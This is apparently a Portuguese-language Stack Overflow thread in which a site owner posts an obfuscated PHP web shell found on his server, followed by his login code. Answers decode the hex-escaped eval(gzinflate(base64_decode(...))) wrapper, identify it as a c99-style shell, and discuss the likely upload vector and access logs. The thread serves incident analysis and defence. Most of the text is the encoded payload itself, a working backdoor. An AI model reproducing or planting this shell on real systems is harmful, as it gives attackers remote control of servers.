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'\x29\x29\x29\x3B","\x2E");
?>
```

A Partir da raiz administrativa do site o controle de login em todas as páginas é basicamente:

```
<?php
session_start();
require_once ("/aut/EMP_user.php");

$usuarioDAO = new usuarioDAO();

if (isset($_SESSION['logado']) ? $_SESSION['logado'] : NULL == 1) {
    ?>
    <script type="text/javascript">
        document.location.href = "index.php";
    </script>
    <?php
}
?>

if (isset($_GET['erro'])) {
    switch ($_GET['erro']) {
        case "1":
            ?>
            <script type="text/javascript">
                alert("Você não tem permissão para acessar o painel.");
            </script>
            <?php
            break;
        case "2":
            ?>
            <script type="text/javascript">
                alert("Você saiu do painel.");
            </script>
            <?php
            break;
    }
}
?>
```

E para validar o login (login.php):

```
<?php
if (isset($_POST['btnSubmit'])) {

    if ($usuarioDAO->login($_POST['email'],sha1($_POST['password']))) {

        $_SESSION['logado'] = '1';
        ?>

        <script type="text/javascript">
            document.location.href = "index.php";
        </script>
        <?php
    } else {
        ?>
        <script type="text/javascript">
            alert("Usuário ou senha inválido.");
        </script>
        <?php
    }
}
```

EMP_user.php:

```
<?php

require_once("../../Connections/EMP_config.php");

class usuarioDAO {

    function __construct() {
        $this->pdo = Conexao::EMP_getInstance();
    }
    function login($EMP_us_email, $EMP_se_senha) {
        try {


              $EMP_us_email = addslashes($EMP_us_email);
              $EMP_se_senha = addslashes($EMP_se_senha);

              $stmt = $this->pdo->prepare("SELECT * FROM admin WHERE email = :EMP_us_email AND password = :EMP_se_senha");

            $param = array(
                ":EMP_us_email" => $EMP_us_email,
                ":EMP_se_senha" => $EMP_se_senha
            );


            $stmt->execute($param);

            if ($stmt->rowCount() > 0) {
                return true;
            } else {
                return false;
            }
        } catch (PDOException $ex) {
            echo "ERRO 04: {$ex->getMessage()}";
        }
    }

}

?>
```

Comment: Tomei a liberdade e deletei o script shell do seu site para evitar que alguém mal intencionado realiza-se alguma alteração.

Comment: ok! muito obrigado

Answer (score 4, accepted):

Sobre seu problema dê uma olhada se existe alguma área ou script que aceita upload pois pode ser a partir dai que o shell foi upado.

---

Os `\x` é [encondig ASCII](https://pt.stackoverflow.com/a/126349/3999) na notação hexa-decimal.

Decodifiquei onde estava usando:

```
// "\x2F\x2E\x2A\x2F\x65" => /.*/e
// "\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28" => eval(gzinflate(base64_decode(
// "\x29\x29\x29\x3B" => )));
// "\x2E" => .
```

Então ele utilizou o eval pra executar uma string como código, [gzinflate](http://php.net/manual/pt_BR/function.gzinflate.php) para descomprimir o retorno do trecho decodificado usando base64.

Basicamente o script é esse: http://pastebin.com/5Shmh0Vm

Comment: Curiosidade, o que esse código faz de prejudicial? Parece uma pagina "fake".

Comment: Lendo por alto ele lista informações relativas ao servidor, permite fazer upload/alterações, ver os arquivos, etc. É uma [shell](https://pt.wikipedia.org/wiki/Php_shell) a mais famosa é a c99.

Comment: Vale mencionar como isso pode ter chegado ao código dele: SQL Injection, ou alguém com acesso ao servidor (legítimo ou não).

Comment: Interessante que esse shell tem até funções para lidar com banco de dados e até verificação para caso for um crawler no user agent ele retornar 404.

Comment: Obrigado pela explicação @Laerte compreendi perfeitamente.

Comment: Este script bagunça geral, o shell abre diversas funcionalidades @diegofm é só ver o código que ele abre, onde o Larte postou http://pastebin.com/5Shmh0Vm

Comment: @RafaelAssmann eu cheguei a abrir, mas infelizmente não é da minha área de conhecimento algumas coisas em javascript e php constantes lá :/

Comment: Só pesquisar amigo, programação não tem segredo haha :D @RafaelAssmann caso a resposta tenha lhe atendido marque como resposta.

Comment: @RafaelAssmann Verifique também se você não está usando algum plugin vulnerável.

Comment: @Laerte Eu uso plugin sim, e já usei diversos app free para verificar vulnerabilidades mas nada encontrado, me indica algo? Eu uso basicamente isso apra upload http://blueimp.github.io/jQuery-File-Upload/    (Basic Plus UI)

Comment: Faça um teste, upe um arquivo usando esse arquivo e verifique se ele irá ser executado acessando diretamente, caso for positivo filtre os formatos que ele irá aceitar (php por exemplo).

Comment: @Laerte este teste fiz já antes de entregar, liberei apenas extensões jpg, png e gif. Além disso tenho o controle de login em todas as páginas php que postei na pergunta. Ou seja como o individuo chegou a dar upload na raiz onde encontram-se a minha imagem entendes a dúvida?

Comment: @RafaelAssmann Você pode verificar o log pra ver quando essa página começou a ser acessada? Talvez consiga rastrear a origem do upload.

Comment: @Laerte acessei o log, mas no inicio apresenta apenas isso:
Line 2635938: 125.166.228.94 - - [21/May/2016:20:43:00 -0300] "GET //admin//pages//server//php//files//ws0oxp.php HTTP/1.1" 200 4535
 Line 2635951: 125.166.228.94 - - [21/May/2016:20:43:18 -0300] "POST //admin//pages//server//php//files//ws0oxp.php HTTP/1.1" 200 3729
 Line 2635990: 125.166.228.94 - - [21/May/2016:20:45:17 -0300] "POST //admin//pages//server//php//files//ws0oxp.php HTTP/1.1" 200 4112
 Line 2636034: 125.166.228.94 - - [21/May/2016:20:45:21 -0300] 
...